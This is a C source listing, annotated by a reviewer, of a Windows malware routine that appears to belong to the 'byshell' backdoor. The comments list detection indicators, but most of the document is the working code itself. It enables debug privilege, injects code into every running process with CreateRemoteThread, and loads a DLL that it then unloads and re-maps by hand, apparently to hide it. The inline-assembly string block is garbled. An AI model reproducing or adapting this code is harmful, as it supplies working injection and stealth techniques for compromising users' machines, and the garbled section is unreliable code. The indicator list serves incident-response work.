/*
 * injcode -- reviewer's annotation of a reposted listing (defensive reading).
 *
 * What the visible code does: enables SeDebugPrivilege on the current token,
 * creates three named synchronisation objects and a named section whose DACL
 * is then opened to EVERYONE, and walks a Toolhelp process snapshot. For each
 * process it copies a parameter struct (injapistr) and 20000 bytes starting
 * at injfunc's address into the target and starts that copy with
 * CreateRemoteThread.
 *
 * Host artifacts that this function leaves, taken directly from the lines
 * below, useful for detection and incident response:
 *   - mutexes "by067clean" and "by067revive", event "by067check"
 *   - file mapping "by067filemapping" (1024 bytes) with GENERIC_ALL granted
 *     to the group "EVERYONE"
 *   - a 4-byte ReadProcessMemory probe at 0x19850000 in each target, used as
 *     the "already present" marker
 *   - two RWX allocations in every target (sizeof(injapistr) and 20000
 *     bytes) followed by a remote thread
 * Targets are every entry with th32ProcessID >= 10; note the for-loop
 * evaluates Process32Next before its first iteration, so the entry returned
 * by Process32First is never processed.
 *
 * The listing arrived collapsed onto a few physical lines; it is re-laid out
 * here with every token unchanged. Identifiers not defined on this page and
 * assumed to come from elsewhere in the project: injapistr / INJAPISTR,
 * MAINPROC1, MAINPROC2, DLLIMAGESIZE, the bydbg build flag.
 */
void injcode(){
    HANDLE prohandle;
    DWORD pid=0;
    int ret;
    int tmp;
    HANDLE fm;
    //SE_DEBUG_NAME
    // Enable SeDebugPrivilege on our own token so OpenProcess(PROCESS_ALL_ACCESS)
    // below can reach processes of other users; none of the three calls is checked.
    HANDLE hToken;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
    //retrive pid from toolhelp32
    Sleep(1000);
    HANDLE snapshot;
    snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    struct tagPROCESSENTRY32 processsnap;
    processsnap.dwSize=sizeof(tagPROCESSENTRY32);
    // Named global objects; each is an observable indicator on an infected host.
    // The handles are truncated to int and never closed here.
    ret=(int)CreateMutex(0,0,"by067clean");
    if(!ret){MessageBox(0,0,0,0);goto err1;}
    ret=(int)CreateMutex(0,0,"by067revive");
    if(!ret){MessageBox(0,0,0,0);goto err1;}
    ret=(int)CreateEvent(0,0,1,"by067check");// initial state is set to 1 (signaled) -- keep this in mind
    if(!ret){MessageBox(0,0,0,0);goto err1;}
    // Pagefile-backed section, 1024 bytes, under a fixed name.
    fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");
    if(!fm){MessageBox(0,0,0,0);goto err1;}
    // the file mapping's permissions are set so that anyone can read and write it
    // (GENERIC_ALL for the group "EVERYONE" is appended to the existing DACL).
    PACL pdacl;
    PACL pnewdacl;
    PSECURITY_DESCRIPTOR psd;
    EXPLICIT_ACCESS ace;
    int ret1;
    GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);
    ace.grfAccessPermissions=GENERIC_ALL;
    ace.grfAccessMode=GRANT_ACCESS;
    ace.grfInheritance=NO_INHERITANCE;
    ace.Trustee.pMultipleTrustee=0;
    ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;
    ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;
    ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;
    ace.Trustee.ptstrName="EVERYONE";
    SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);
    ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);
    if(ret1){goto err2;}
    //char injexe[]="explorer.exe";//for debugging: restrict to a single process
    // Walk every process in the snapshot. The loop condition calls Process32Next
    // before the first body execution, so the Process32First entry is skipped.
    for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){
        //if(stricmp(processsnap.szExeFile,injexe)){continue;}
        if(processsnap.th32ProcessID<10){continue;}
        // ismainthread tags which of two named host processes (MAINPROC1 /
        // MAINPROC2, defined elsewhere) this target is; 0 for everything else.
        if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}
        else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}
        else{injapistr.ismainthread=0;}
        pid=processsnap.th32ProcessID;
        //inj
        // OpenProcess result is not checked; a readable 4 bytes at 0x19850000
        // is treated as "already injected" and the process is skipped
        // (prohandle is not closed on that path).
        prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
        if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;} // byshell already loaded once? then do nothing
        DWORD WINAPI injfunc(LPVOID);
        HMODULE hModule;
        LPVOID paramaddr;
        // The kernel32 entry points the remote code will need are resolved here
        // and passed by value in injapistr, since the copied code cannot use
        // this image's import table.
        hModule=LoadLibrary("kernel32.dll");
        injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
        injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
        injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
        injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
        injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
        injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
        // Two RWX allocations in the target: the parameter block, then a fixed
        // 20000 bytes filled from injfunc's address. Write results are not checked.
        paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
        ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
        void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
        ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
        ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
        if(!ret){
            int tmp=GetLastError();
#ifdef bydbg
            // Debug build only: break into the debugger with pid/error in registers.
            OutputDebugString("cannot infect process:see pid in edx,err code in eaxn");
            __asm mov eax,tmp
            __asm mov edx,pid
            __asm int 3;
#endif
        }
        CloseHandle(prohandle);
    }//end for
    CloseHandle(snapshot);
    return;
    // Error exits: only reachable via goto; each is a debug breakpoint under bydbg.
    {
err1:
#ifdef bydbg
        OutputDebugString("create global obj failedn");
        __asm int 3;
#endif
        return;
    }
    {
err2:
#ifdef bydbg
        OutputDebugString("cannot set DACL of section,see err code in eaxn");
        __asm mov eax,ret1
        __asm int 3;
#endif
        return;
    }
}

/*
 * injfunc -- the routine whose bytes injcode copies into each target process
 * and starts with CreateRemoteThread. paramaddr points at the INJAPISTR that
 * injcode wrote into the target; every API it uses comes through that struct.
 *
 * Visible behaviour: builds "ntboot.dll" and "CmdService" on the stack with
 * inline asm (the asm block is extraction-garbled on this page -- typographic
 * quotes and a missing operator between the array name and the offset -- and
 * is left exactly as found), loads ntboot.dll through the passed LoadLibraryA
 * pointer, and returns unless the module landed at 0x19850000, the same
 * address injcode probes as its "already present" marker. It then copies
 * DLLIMAGESIZE bytes of the image to a temporary buffer, frees the library,
 * re-allocates DLLIMAGESIZE bytes at the old base as PAGE_EXECUTE_READWRITE,
 * copies the image back and releases the temporary buffer. The call to
 * CmdService is commented out on this page.
 *
 * Detection note: the result is a private RWX region of DLLIMAGESIZE bytes at
 * 0x19850000 holding a DLL image, presumably without a loader-list entry since
 * the module was unloaded and its memory re-created by VirtualAlloc (inferred,
 * not shown on the page).
 */
DWORD WINAPI injfunc(LPVOID paramaddr){
    char ntboot[16];
    char msgbox[16];
    INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;
    // String constants are assembled byte by byte so no data section of the
    // original image is referenced from the copied code.
    __asm{
        mov ntboot,’n’
        mov ntboot 1,’t’
        mov ntboot 2,’b’
        mov ntboot 3,’o’
        mov ntboot 4,’o’
        mov ntboot 5,’t’
        mov ntboot 6,’.’
        mov ntboot 7,’d’
        mov ntboot 8,’l’
        mov ntboot 9,’l’
        mov ntboot 10,0
        mov msgbox,’C’
        mov msgbox 1,’m’
        mov msgbox 2,’d’
        mov msgbox 3,’S’
        mov msgbox 4,’e’
        mov msgbox 5,’r’
        mov msgbox 6,’v’
        mov msgbox 7,’i’
        mov msgbox 8,’c’
        mov msgbox 9,’e’
        mov msgbox 10,0
    }
    HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);
    if((int)hModule!=0x19850000){return 0;}// special case: only proceed when the DLL got its expected base
    DWORD (WINAPI *myCmdService)(LPVOID);
    myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));
    unsigned int memsize=0;
    // Copy image out, unload it, then re-create the same range by hand and copy
    // the image back in.
    void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    memcpy(tempdll,hModule,DLLIMAGESIZE);
    pinjapistr->myFreeLibrary(hModule);
    hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    memcpy(hModule,tempdll,DLLIMAGESIZE);
    pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);
    // myCmdService((void*)(pinjapistr->ismainthread));
    return 0;
}